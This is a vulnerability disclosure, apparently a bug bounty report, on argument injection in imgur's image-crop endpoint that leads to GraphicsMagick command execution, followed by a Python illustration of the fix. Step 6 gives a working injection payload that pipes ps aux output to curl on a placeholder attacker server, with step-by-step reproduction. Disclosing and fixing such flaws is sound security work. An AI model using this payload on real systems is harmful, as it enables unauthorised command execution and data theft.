CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 7.5 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.975 High
Percentile: 99.9%
The y parameter of the /edit/process endpoint (with a=crop) is vulnerable to command-line argument injection into what appears to be a GraphicsMagick utility (probably gm convert). Because of GraphicsMagick's "hacker-friendly" handling of filenames starting with | that are supplied to the -write option, the injected argument leads to command execution.
1. Enable Burp Proxy or similar software that allows you to log and edit HTTP requests.
2. Log in to your imgur account and upload an image.
3. Move your mouse over the image, click the tiny button with a pencil on it, then click "Edit".
4. Select a random rectangle on the image, then click "Apply".
5. In Burp Suite, you will see a request to a URL like this: http://<your-account>.imgur.com/edit/process?imageid=c9e1351c21542062f35a12130945210b&a=crop&x=0&y=0&w=700&h=746&random=4011802027746510
6. Change the y parameter of the request so it becomes 0 -write |ps${IFS}aux|curl${IFS}http://<your-server>${IFS}-d${IFS}@-
   The full URL after the change must look like http://<your-account>.imgur.com/edit/process?imageid=c9e1351c21542062f35a12130945210b&a=crop&x=0&y=0%20-write%20|ps${IFS}aux|curl${IFS}http://<your-server>${IFS}-d${IFS}@-&w=700&h=830&random=9905392865702303 (note that you have to change <your-server> to a webserver under your control).
7. Fire a request to the modified URL. The command (ps aux|curl http://<your-server> -d @-) will be executed somewhere inside imgur, and you will get an HTTP request to <your-server> with the result of ps aux in the POST body. You can replace ps aux with another command (but you have to write ${IFS} instead of spaces).
I was searching for CVE-2016-10033-like vulnerabilities on several bug bounty sites when I noticed strange behaviour of the mentioned parameter. The vulnerability exists because the user input (the contents of the y GET parameter) goes into a shell command. While all special characters (like |, $ and so on) seem to be escaped, the space character is not. This allows the attacker to insert additional command-line arguments. The common reason for such behaviour is the escapeshellcmd PHP function, but it can also be some kind of custom input filtering/processing.
The rest of the exploitation depends on the program that is executed (we need to find out if it supports any dangerous command-line options). Common sense suggests that the external command launched by the "Crop/Resize" function must be some image processing tool. The most popular one is ImageMagick/GraphicsMagick, so I appended -rotate 90 to the parameter and it succeeded: I saw a lying Trump (I mean, the image was rotated). After more tries I was sure it's GraphicsMagick (probably the gm convert utility). I read the documentation and found that the -write argument supports Perl-style filenames starting with a pipe; in this case the rest of the filename must be a command to execute.
Probably either some kind of custom processing or the escapeshellcmd function is used to construct the command line. In both cases, replace it by applying escapeshellarg to the individual arguments. In the second case, you probably want to run grep -R escapeshellcmd <path to the source code> to find more vulns :-)
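As an added illustration of the fix described above (this is not imgur's code and not part of the report), the Python snippet below emulates PHP's escapeshellcmd() escaping, shows how a crafted y value still splits into extra gm arguments once the command string goes through a shell, and contrasts it with a hardened builder that validates every crop field as an integer and builds the argv list directly (the PHP equivalent being escapeshellarg() on each argument). The gm convert -crop command shape and the harmless echo marker payload are assumptions.

```python
import re
import shlex
from typing import List

# Emulation of PHP escapeshellcmd(): these metacharacters get a backslash prefix,
# but the space character does not (constructed from the PHP docs; not imgur's code).
_ESCAPED = set('#&;`|*?~<>^()[]{}$\\\n')


def escapeshellcmd_like(value: str) -> str:
    return ''.join('\\' + c if c in _ESCAPED else c for c in value)


def vulnerable_argv(x: str, y: str, w: str, h: str) -> List[str]:
    """Vulnerable pattern: escape each field, interpolate into one command string and
    hand it to a shell. Returns the argv the shell produces after word-splitting.
    The -crop geometry form is an assumption about how the fields were used."""
    cmd = 'gm convert in.jpg -crop {w}x{h}+{x}+{y} out.jpg'.format(
        x=escapeshellcmd_like(x), y=escapeshellcmd_like(y),
        w=escapeshellcmd_like(w), h=escapeshellcmd_like(h))
    return shlex.split(cmd)  # unescaped spaces inside y become new arguments


_FIELD = re.compile(r'[0-9]{1,5}')


def hardened_argv(x: str, y: str, w: str, h: str) -> List[str]:
    """Hardened form: each crop field must be a small non-negative integer, and the
    argv is built as a list so no shell ever parses it. In PHP the equivalent is
    escapeshellarg() on every argument, or proc_open() with an array command."""
    for name, value in (('x', x), ('y', y), ('w', w), ('h', h)):
        if not _FIELD.fullmatch(value):
            raise ValueError(f'{name} must be a non-negative integer, got {value!r}')
    return ['gm', 'convert', 'in.jpg', '-crop', f'{w}x{h}+{x}+{y}', 'out.jpg']


def injected_tokens(argv: List[str]) -> List[str]:
    """Detection check for tests or process logs: after the fixed 'gm convert in.jpg
    -crop' prefix, any token that looks like an option or a pipe filename is injected."""
    return [t for t in argv[4:] if t.startswith('-') or t.startswith('|')]


if __name__ == '__main__':
    crafted = '0 -write |echo${IFS}injected'  # constructed harmless marker payload
    print(vulnerable_argv('0', crafted, '700', '746'))
    print(injected_tokens(vulnerable_argv('0', crafted, '700', '746')))
    print(hardened_argv('0', '0', '700', '746'))
```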